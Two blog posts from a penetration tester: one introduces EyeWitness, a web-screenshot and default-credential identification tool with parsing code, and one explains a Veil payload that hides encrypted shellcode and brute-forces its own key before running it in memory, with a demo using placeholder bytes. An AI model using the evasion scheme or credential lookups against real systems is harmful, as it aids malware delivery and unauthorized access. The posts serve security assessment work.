However, PeepingTom relies on PhantomJS, which needs to be downloaded separately, and I’ve hit a couple of cases where it fails to grab a screenshot of a web application, which intrigued me.  I started researching different ways to take screenshots from a Python script and stumbled upon Ghost.py.  Ghost is a self-described “webkit based scriptable web browser for python” that can very easily screenshot web pages.  At that point, I thought it would be a fun exercise to create my own tool that captures screenshots and generates a report, and the end result is EyeWitness.

EyeWitnessUI

EyeWitness is designed to take a file, parse out the URLs, take a screenshot of each web page, and generate a report containing the screenshots alongside some server header information.  EyeWitness can parse three different file types: a plain text file with one URL per line, the XML output from an Nmap scan, or a .nessus file.  Jason Hill (@jasonhillva) wrote the XML parsing code for EyeWitness and provided a lot of feedback throughout development.  We compared the results of both the Nmap and Nessus parsers against Tim Tomes’s parser in PeepingTom, and they are near identical, so we’re happy with the parsing capabilities.
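To give a flavor of what the Nmap XML parsing involves, the sketch below pulls URLs for open web services out of an Nmap XML document using only the standard library.  It is illustrative, not the actual parser, which handles many more cases:

```python
import xml.etree.ElementTree as ET


def urls_from_nmap_xml(xml_text):
    """Extract http(s) URLs for open ports from Nmap XML output."""
    urls = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            service = port.find("service")
            if state is None or state.get("state") != "open":
                continue  # only screenshot ports that are actually open
            name = service.get("name", "") if service is not None else ""
            if name.startswith("http"):
                scheme = "https" if name == "https" else "http"
                urls.append("%s://%s:%s" % (scheme, addr, port.get("portid")))
    return urls
```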

In addition to providing the file name, you can also optionally provide a maximum timeout value.  The timeout value is the maximum amount of time EyeWitness waits for a web page to render, before moving on to the next URL in the list.

EyeWitnessCLI

EyeWitness will generate a report based on the screenshots it was able to grab, and will provide the header information alongside it.  The report is extremely similar to PeepingTom’s output because I honestly thought it contained a lot of useful information.

EyeWitnessReport

There are a couple of things EyeWitness does to differentiate itself.  EyeWitness can identify default credentials for the web applications it looks at: when it recognizes a web application, it provides the default credentials along with the server header info.  Currently, EyeWitness recognizes only a small number of devices/web pages in its signature file, but that’s simply because I don’t have direct access to other machines at the moment.

Also, screenshots captured by EyeWitness are near full size and contain the entire page at the specified URL.  You can easily view the full screenshot by moving the slider within the table, or simply click on the picture to open it in its own tab.

Another option EyeWitness provides is the ability to open all URLs within a web browser (on Kali) automatically, as it goes through the list of URLs.  So, as the tool runs, an iceweasel web browser will open tabs of all the URLs you provided within the input file.

I’d like to issue a call to action.  If you find web pages or networked devices that use default credentials, I’d love it if you could send me the source code of the index page, along with the default credentials, to EyeWitness [at] christophertruncer [dot] com, or simply send a pull request with the signature you created in the signature file.  As I encounter applications with default credentials, or am sent them, I will update EyeWitness to identify them and provide those default creds.

To add signatures to the signatures.txt file, simply add the “signature” which is used to uniquely identify the web app/device on a new line, use the “|” (pipe) as the delimiter, and then add the default credentials on the same line.
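For example, a line for a hypothetical Tomcat manager page might look like `Apache Tomcat|tomcat:tomcat` (an illustrative entry, not one shipped with EyeWitness).  Matching then reduces to a substring check per line, roughly like this sketch (not EyeWitness’s actual code):

```python
def load_signatures(lines):
    """Parse signature|default-creds lines from a signatures.txt-style file."""
    sigs = []
    for line in lines:
        line = line.strip()
        if not line or "|" not in line:
            continue  # skip blanks and malformed lines
        marker, creds = line.split("|", 1)
        sigs.append((marker, creds))
    return sigs


def default_creds_for(page_source, sigs):
    """Return the default credentials for the first signature found in the page."""
    for marker, creds in sigs:
        if marker in page_source:
            return creds
    return None
```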

Thanks again for checking EyeWitness out, and hope that it can help you out on assessments!

EyeWitness can be cloned from – https://github.com/ChrisTruncer/EyeWitness

A slide deck I made for a NOVAHackers presentation is available here.

Developing a Self-Brute Forcing Payload for Veil

I’ve always thought the concepts that Hyperion utilizes to encrypt and hide an executable are very interesting.  As a result, I thought it would be a fun exercise to try to create a Veil payload that utilizes the following concepts:

  • Encrypt the shellcode stored within the executable
  • Only contain part of the decryption key within the executable
  • Make the payload brute force itself to find the complete decryption key

Hopefully, it’ll be worthwhile to walk you through how this payload works, so that’s what I’ll do. 🙂

Encrypting and decrypting shellcode is the easy part; it’s already done in Veil’s AES, DES, and ARC4 encrypted payloads.  But I needed a script that attempts to decrypt our ciphertext thousands of times until it finds the decryption key.  I incorrectly assumed that using the wrong decryption key would throw an exception, but that isn’t the case: the decryption routine still runs on our ciphertext, and garbage data is returned as our “cleartext”.  Since I can’t trigger an event on an exception from the wrong key, I needed a different way to determine when the real key has been found.  My implementation is to encrypt a known string with the same key used to encrypt the shellcode.

Each round of the decryption routine decrypts the ciphertext containing our known cleartext string and compares the result to the known plaintext.  If they don’t match, the code assumes the wrong decryption key was used and moves on to another key.  If the decrypted string matches our known string, the code assumes the real key has been found.

BruteForcing Payload

The picture above shows the obfuscated source code of the brute-forcing payload.  Line 5 contains part of our decryption key, but not all of it.  The key was artificially constrained so that the final few ASCII characters of the decryption key are numeric.  The numbers chosen fall within a known range, so while we don’t know the exact number used, we can simply try every number in the known keyspace until the correct decryption key is identified.

Line 8 creates a for loop which will loop through all numbers within the known keyspace, and line 9 creates a decryption key by concatenating our partial key plus the “current number” of our for loop.  Line 11 is our attempt to decrypt our known string, and line 12 is checking the decrypted value against our known string.  If it’s a match, we can assume that this is our decryption key.

Once the key has been found, the script then drops into the if statement, and acts like any of Veil’s other encrypted payloads; system memory is allocated for use, the shellcode is decrypted, placed into memory, and then the decrypted shellcode is executed in memory.
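The whole scheme can be demonstrated end to end in a few lines.  This is a stand-in, not Veil’s generated payload: the real payloads use AES/DES/ARC4 from a crypto library, while this sketch substitutes a SHA-256-derived XOR keystream so it runs with the standard library alone, and the “shellcode” here is just placeholder bytes:

```python
import hashlib
import random


def stream_crypt(key, data):
    """XOR data with a SHA-256-derived keystream (stand-in for AES/ARC4)."""
    out, block = bytearray(), key
    for i, byte in enumerate(data):
        if i % 32 == 0:
            block = hashlib.sha256(block).digest()  # next 32-byte keystream block
        out.append(byte ^ block[i % 32])
    return bytes(out)


PARTIAL_KEY = b"s3cretKeyPrefix"   # the only key material shipped in the binary
KNOWN_PLAIN = b"known string"      # canary used to recognize the right key

# "Build time": append a random numeric suffix, encrypt, then discard the suffix.
suffix = random.randint(0, 9999)
full_key = PARTIAL_KEY + b"%04d" % suffix
canary_ct = stream_crypt(full_key, KNOWN_PLAIN)
shellcode_ct = stream_crypt(full_key, b"\x90\x90\xcc")  # placeholder "shellcode"

# "Run time": brute force the numeric suffix until the canary decrypts cleanly.
shellcode = None
for guess in range(10000):
    candidate = PARTIAL_KEY + b"%04d" % guess
    if stream_crypt(candidate, canary_ct) == KNOWN_PLAIN:  # XOR is its own inverse
        shellcode = stream_crypt(candidate, shellcode_ct)
        break
```

A real payload would then allocate memory, copy the decrypted shellcode in, and execute it; here the loop simply proves the partial-key search recovers the data.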

The time it takes to receive the callback from this payload obviously varies based on the “random” number that was generated and used in the decryption key.  This payload will be released shortly in one of Veil’s upcoming V-Days.